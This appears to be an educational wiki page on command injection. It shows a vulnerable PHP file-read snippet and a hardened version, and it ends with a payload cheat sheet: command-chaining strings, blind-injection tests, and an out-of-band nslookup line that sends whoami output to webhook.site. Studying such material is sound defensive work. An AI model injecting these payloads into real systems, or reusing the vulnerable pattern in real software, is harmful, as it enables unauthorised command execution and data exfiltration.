Command injection
What is it?
Command injection is a vulnerability that allows an attacker to manipulate an application to execute arbitrary system commands on the server. This occurs when an application passes unsafe data, often user input, to a system shell.
A simple example
A vulnerable web application might take a path from a query parameter and use it to read a file, like so:
$file = $_GET['file'];              // untrusted input taken straight from the query string
system("cat /var/www/html/$file");  // interpolated into a shell command line without any validation
If an attacker supplies a payload such as ; ls -la in the file parameter, they can make the application execute an additional command that lists all files in the current directory. The shell runs the cat command, then the ls command, and the attacker receives the directory listing in the response.
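The vulnerable handler above beside a hardened version, as an added example that is not part of the original page; it assumes /var/www/html as the base directory, the same $_GET['file'] input, and PHP 8 or later (for str_contains and str_starts_with):

```php
<?php
// Added example, not from the original page. Assumptions: base directory
// /var/www/html, input in $_GET['file'] as above, PHP >= 8.0.

// Vulnerable (as on the page): the raw parameter is interpolated into a
// command line, so ; & | ` $( ) and newlines are interpreted by the shell.
function read_file_vulnerable(string $file): string
{
    return (string) shell_exec("cat /var/www/html/$file");
}

// Hardened: no shell at all. Allow-list the name, resolve it, confirm it
// still sits inside the base directory, then read it with file_get_contents().
function read_file_safe(string $file): string
{
    $baseDir = realpath('/var/www/html');
    if ($baseDir === false) {
        throw new RuntimeException('base directory missing');
    }

    // Only plain file names: no path separators, no shell metacharacters,
    // and no ".." (the character class alone would admit "..").
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $file) || str_contains($file, '..')) {
        error_log('rejected file parameter: ' . bin2hex($file)); // feed for detection
        throw new InvalidArgumentException('invalid file name');
    }

    $path = realpath($baseDir . '/' . $file);
    if ($path === false || !str_starts_with($path, $baseDir . '/')) {
        throw new RuntimeException('file not found');
    }
    return (string) file_get_contents($path);
}

// If an external command is unavoidable, every untrusted value goes through
// escapeshellarg() so the shell sees one quoted argument, never syntax.
// This stops injection only; the allow-list above is still needed to stop
// path traversal via ".." segments.
function read_file_escaped(string $file): string
{
    return (string) shell_exec('cat ' . escapeshellarg('/var/www/html/' . $file));
}

try {
    echo read_file_safe($_GET['file'] ?? '');
} catch (Throwable $e) {
    http_response_code(400);
    echo 'bad request';
}
```

With this in place, the page's payloads (; ls -la, && ls -la, | ls -la) fail the allow-list check and are logged rather than reaching any shell.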
Command injection can often lead to:
Remote code execution
Denial of Service
Data breach
Privilege escalation
Other learning resources:
Writeups:
Bullets
Checklist
Exploitation
Basic command chaining
; ls -la
Using logic operators
&& ls -la
Commenting out the rest of a command
; ls -la #
Using a pipe for command chaining
| ls -la
Testing for blind injection
; sleep 10
; ping -c 10 127.0.0.1
& whoami > /var/www/html/whoami.txt &
Out-of-band testing
& nslookup webhook.site/<id>?`whoami` &